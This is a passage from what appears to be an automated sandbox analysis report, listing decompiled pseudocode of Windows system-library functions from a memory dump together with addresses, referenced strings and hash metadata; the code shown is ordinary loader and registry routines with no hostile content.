								E00FEF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E00FE95D0();
										L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x00fdf0d3
0x00fdf0d9
0x00fdf0e0
0x00fdf0e7
0x00fdf0f2
0x00fdf0f4
0x00fdf0f8
0x00fdf100
0x00fdf108
0x00fdf10d
0x00fdf115
0x00fdf116
0x00fdf11f
0x00fdf123
0x00fdf124
0x00fdf12c
0x00fdf130
0x00fdf134
0x00fdf13d
0x00fdf144
0x00fdf14b
0x00fdf152
0x0101bab0
0x0101bab0
0x00fdf158
0x00fdf158
0x00fdf15a
0x00fdf160
0x00fdf165
0x00fdf166
0x00fdf16f
0x00fdf173
0x0101baa7
0x0101baa7
0x0101baab
0x00000000
0x00fdf179
0x00fdf18d
0x00fdf191
0x0101baa2
0x00000000
0x00fdf197
0x00fdf19b
0x00fdf1a2
0x00fdf1a9
0x00fdf1af
0x00fdf1b2
0x00fdf1b6
0x00fdf1b9
0x00fdf1c4
0x00fdf1d8
0x00fdf1df
0x00fdf1e3
0x00fdf1eb
0x00fdf1ee
0x00fdf1f4
0x00fdf20f
0x0101bab7
0x0101babb
0x0101bacc
0x0101bad1
0x00fdf215
0x00fdf218
0x00fdf226
0x00fdf22b
0x00000000
0x00fdf22b
0x00fdf1f6
0x00fdf1f6
0x00fdf1f9
0x00fdf1fb
0x00fdf1fb
0x00fdf1f4
0x00fdf191
0x00fdf173
0x00fdf152
0x00fdf203

Strings

@, xrefs: 00FDF124

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: fd6ae16ba542979173b3be8fface78b2749fa915ad0d3452dcc3924ca003f452
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 4C517A725047119BC321DF29C841A6BBBF5BF48710F008A2EF99687690E7B4E904DB91

Uniqueness

Uniqueness Score: -1.00%

Function 01023540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01023540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x109d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E00FE0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01023706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E00FEFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01023540;
						E00FEFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E00FFDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01030C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E00FE97C0();
					}
					return E00FEB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01023971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01023884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E00FEFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E00FE9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01023787(_a4,  &_v352, _t80);
						}
					}
					L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E00FE95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01023552
0x0102355a
0x0102355d
0x01023566
0x01023567
0x0102357e
0x0102358f
0x010235a1
0x010235a5
0x0102366b
0x0102366b
0x0102366d
0x01023672
0x01023679
0x01023685
0x0102368d
0x0102369d
0x010236a7
0x010236b8
0x010236c6
0x010236c7
0x010236dc
0x010236e1
0x010236e7
0x010236e9
0x010236e9
0x01023703
0x01023703
0x010235b5
0x010235c0
0x010235c4
0x00000000
0x00000000
0x010235ca
0x010235d7
0x010235e2
0x010235e6
0x010235e8
0x010235f5
0x010235fa
0x01023603
0x01023604
0x01023609
0x0102360a
0x01023612
0x01023613
0x0102361e
0x01023622
0x01023628
0x0102362f
0x0102362f
0x01023636
0x01023638
0x0102363b
0x01023642
0x01023642
0x01023636
0x01023657
0x01023657
0x0102365c
0x01023662
0x01023669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0102358F

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 97e59eac76aab129a56d72a86e71ee389ca9ac4e70b53344c84c23a5db933507
Instruction ID: 68c9fb18ca7ab985dd334a21e120561ea123f977db5e9998841c0152d655641d
Opcode Fuzzy Hash: 97e59eac76aab129a56d72a86e71ee389ca9ac4e70b53344c84c23a5db933507
Instruction Fuzzy Hash: 934164B1D0012D9ADB219A50CC85FDEB77CAB48714F0085E5EA48AB241DB759E888FA4

Uniqueness

Uniqueness Score: -1.00%

Function 010705AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E010705AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E010707DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E00FE9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0106A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0106A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01071293(_t79, _v40, E010707DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E00FC7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0106138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x010705c5
0x010705ca
0x010705d3
0x010706db
0x010706db
0x010706dd
0x010706e3
0x010706e3
0x010705dd
0x010705e7
0x010705f6
0x01070600
0x01070607
0x01070610
0x01070615
0x0107061a
0x0107061c
0x0107061e
0x01070624
0x01070625
0x01070627
0x01070628
0x01070631
0x01070640
0x0107064d
0x01070654
0x01070654
0x01070631
0x0107066d
0x01070674
0x00000000
0x00000000
0x01070692
0x0107069e
0x010706b0
0x010706a0
0x010706a9
0x010706a9
0x010706b8
0x010706d6
0x010706d6
0x00000000

Strings

`, xrefs: 01070633

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: ec1a69f7223f70614d32d0b3d449703c083495eeb26c294545a167e5f95f4065
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: CB311372B04346ABE710DE28CC45F9B7BD9ABC8754F144228FA84EB284D770E914CB95

Uniqueness

Uniqueness Score: -1.00%

Function 01023884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01023884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E00FE9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L00FC4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E00FE9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x01023893
0x01023896
0x01023899
0x0102389f
0x010238a0
0x010238a4
0x010238a9
0x010238ac
0x010238ad
0x010238ae
0x010238af
0x010238b1
0x010238b4
0x010238bb
0x010238bc
0x010238bd
0x010238c4
0x010238c8
0x010238ca
0x010238ca
0x010238d5
0x0102393e
0x01023940
0x01023942
0x01023952
0x01023954
0x01023961
0x01023961
0x01023967
0x0102396e
0x0102396e
0x01023947
0x0102394c
0x00000000
0x0102394c
0x010238ea
0x010238ee
0x010238f8
0x010238f9
0x010238ff
0x01023900
0x01023902
0x01023903
0x0102390b
0x0102390f
0x01023950
0x00000000
0x01023950
0x01023915
0x0102391d
0x0102391d
0x01023922
0x01023926
0x00000000
0x01023928
0x0102392b
0x0102392b
0x01023935
0x01023937
0x01023937
0x00000000
0x01023935
0x01023926
0x010238f0
0x00000000

Strings

BinaryName, xrefs: 010238B4

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 1793c34798982e3c276baa6708e15c20ecba31e62464ff1af70ddd977ce14986
Instruction ID: f67f256d2f89423844f45de5ff0403199008cea203e1661b858d668350b1bf2d
Opcode Fuzzy Hash: 1793c34798982e3c276baa6708e15c20ecba31e62464ff1af70ddd977ce14986
Instruction Fuzzy Hash: AD310872A0062AAFDB15DA58C946E6FB7B4FB45B20F014169E984AB241D7359E00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FDD294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00FDD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x109d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E00FC4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E00FEB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E00FE98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E00FE95D0();
					L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x00fdd29c
0x00fdd2a6
0x00fdd2b1
0x00fdd2b5
0x00fdd2b6
0x00fdd2bc
0x00fdd2bd
0x00fdd2be
0x00fdd2bf
0x00fdd2c2
0x00fdd2c4
0x00fdd2cc
0x00fdd384
0x00fdd34b
0x00fdd34f
0x00fdd350
0x00fdd351
0x00fdd35c
0x00fdd35c
0x00fdd2d6
0x00fdd2da
0x00fdd2e1
0x00fdd361
0x00fdd369
0x00fdd36d
0x00fdd2e3
0x00fdd2e3
0x00fdd2e3
0x00fdd2e5
0x00fdd2ed
0x00fdd2f5
0x00fdd2fa
0x00fdd302
0x00fdd303
0x00fdd30b
0x00fdd30f
0x00fdd313
0x00fdd318
0x00fdd31c
0x00fdd320
0x00fdd379
0x00fdd37d
0x00000000
0x00000000
0x0101affe
0x0101b001
0x0101b011
0x00000000
0x00fdd322
0x00fdd322
0x00fdd330
0x00fdd337
0x00fdd35d
0x00fdd339
0x00fdd33f
0x00fdd38c
0x00fdd38c
0x00fdd33f
0x00fdd349
0x00000000
0x00fdd349

Strings

@, xrefs: 00FDD303

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 71d1d06d39c7b9229714dc30bd6e4fae740ac56646f883e7c02ce80d0cfc6879
Instruction ID: 45d8ebc2854beea0a1a59e1e55d446980c788cff2e8f4bdcf9b3d2f71d6f8abd
Opcode Fuzzy Hash: 71d1d06d39c7b9229714dc30bd6e4fae740ac56646f883e7c02ce80d0cfc6879
Instruction Fuzzy Hash: 5C31AFB2508345AFC321DF28C981A6BBBE9EB85754F48092EF99483350D635DD04EB93

Uniqueness

Uniqueness Score: -1.00%

Function 00FB1B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00FB1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E00FEBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E00FEA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E00FEA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L00FC4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x00fb1b8f
0x00fb1b9a
0x00fb1b9c
0x00fb1b9e
0x00fb1ba3
0x01007010
0x01007010
0x00000000
0x00fb1ba9
0x00fb1ba9
0x00fb1bae
0x00000000
0x00fb1bc5
0x00fb1bca
0x00fb1bcf
0x00fb1bd0
0x00fb1bd1
0x00fb1bd2
0x00fb1bd6
0x00fb1bdc
0x00fb1be0
0x01006ffc
0x01007000
0x00000000
0x01007006
0x01007009
0x01007009
0x00fb1be6
0x00fb1bec
0x00fb1c0b
0x00fb1c0b
0x00fb1c0c
0x00fb1c11
0x00fb1c12
0x00fb1c15
0x00fb1c1b
0x00fb1c1f
0x00fb1c31
0x00fb1c33
0x01007026
0x01007026
0x00fb1c21
0x00fb1c24
0x00fb1c24
0x00fb1bee
0x00fb1bee
0x00fb1bf2
0x00fb1c3a
0x00fb1bf4
0x00fb1bf4
0x00fb1c05
0x00fb1c05
0x00fb1c09
0x00fb1c3e
0x00000000
0x00000000
0x00000000
0x00fb1c09
0x00fb1bec
0x00fb1be0
0x00fb1bae
0x00fb1c2e

Strings

WindowsExcludedProcs, xrefs: 00FB1BC5

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: e194e7ccd46af3e55f93fe52725750c16a2c53e4183eab3162cbfa7c559935e8
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 4F21F8B7941228EBDB22DA5A8850FDBBBADBF41760F554465F9448B200D634EC00FBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00FCF716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FCF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x00fcf71d
0x00fcf722
0x00fcf726
0x01014770
0x00fcf765
0x00fcf769
0x00fcf769
0x00fcf732
0x0101477a
0x00000000
0x0101477a
0x00fcf738
0x00fcf73a
0x00fcf73c
0x00fcf73f
0x00fcf746
0x00fcf778
0x00fcf7a9
0x00fcf7a9
0x00fcf754
0x00fcf75a
0x00fcf75d
0x00fcf75f
0x00fcf761
0x00fcf76f
0x00fcf771
0x00fcf771
0x00fcf76f
0x00fcf763
0x00000000
0x00fcf763
0x00fcf77d
0x00fcf7a3
0x00fcf7a5
0x00000000
0x00fcf7a5
0x00fcf77f
0x00fcf782
0x00fcf784
0x00fcf786
0x00000000
0x00000000
0x00000000
0x00fcf788
0x00fcf748
0x00fcf74d
0x00fcf78d
0x00fcf793
0x00fcf7b7
0x00fcf7bc
0x00000000
0x00fcf7bc
0x00fcf798
0x00000000
0x00000000
0x00fcf79d
0x00fcf7b0
0x00000000
0x00fcf7b0
0x00fcf79f
0x00000000
0x00fcf74f
0x00fcf74f
0x00000000
0x00fcf74f

Strings

Actx , xrefs: 00FCF73F

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 23191180a5136edc410d1c25714d6faa2c1b8025a9cc457777043744d26b6457
Instruction ID: e26596448174b026cf1d9aaf9ed56613a4ef6b977ce07328c622cbd3d877d537
Opcode Fuzzy Hash: 23191180a5136edc410d1c25714d6faa2c1b8025a9cc457777043744d26b6457
Instruction Fuzzy Hash: 0D117C36B046038BEB244F1D8692F26F697AF95724F34453EE461CB791DA65CC48B340

Uniqueness

Uniqueness Score: -1.00%

Function 01058DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E01058DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1080d50);
				E00FFD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01035720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L00FFDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L00FFDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E00FFD130(_t34, _t39, _t40);
			}

0x01058df1
0x01058df1
0x01058df1
0x01058df1
0x01058df1
0x01058df1
0x01058df3
0x01058df8
0x01058dfd
0x01058e00
0x01058e0e
0x01058e2a
0x01058e36
0x01058e38
0x01058e3c
0x01058e46
0x01058e46
0x01058e36
0x01058e50
0x01058e56
0x01058e59
0x01058e5c
0x01058e60
0x01058e67
0x01058e6d
0x01058e73
0x01058e74
0x01058eb1
0x01058ebd

Strings

Critical error detected %lx, xrefs: 01058E21

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: e54c16e362fe3cebc873b68a18b0d79a267221c98c4c16fb20e44fb5aa24af4b
Instruction ID: 29f2fc5dd5446e3cc604be350983eb5c99c440754e8c8d200076ce1963a2bb45
Opcode Fuzzy Hash: e54c16e362fe3cebc873b68a18b0d79a267221c98c4c16fb20e44fb5aa24af4b
Instruction Fuzzy Hash: 4911AD71D04348DBDF25DFA989067EDBBB1BF04310F20825EE9A96B2A2C3340601EF14

Uniqueness

Uniqueness Score: -1.00%

Function 0103FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0103FF60

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: dc4ef037cb94169779d06b1af8e846af12036e01900723fc793ef4d07f6e16d6
Instruction ID: 33a45d0ded1e3f6a6f3e6eba89f0312dc335e920f57dc785d7d3f0dd45b1d48b
Opcode Fuzzy Hash: dc4ef037cb94169779d06b1af8e846af12036e01900723fc793ef4d07f6e16d6
Instruction Fuzzy Hash: 4111E171910148EFEF62EB54CC49F98BBB2BF44714F148094F6496B2A1C7399940EB91

Uniqueness

Uniqueness Score: -1.00%

Function 01075BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E01075BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
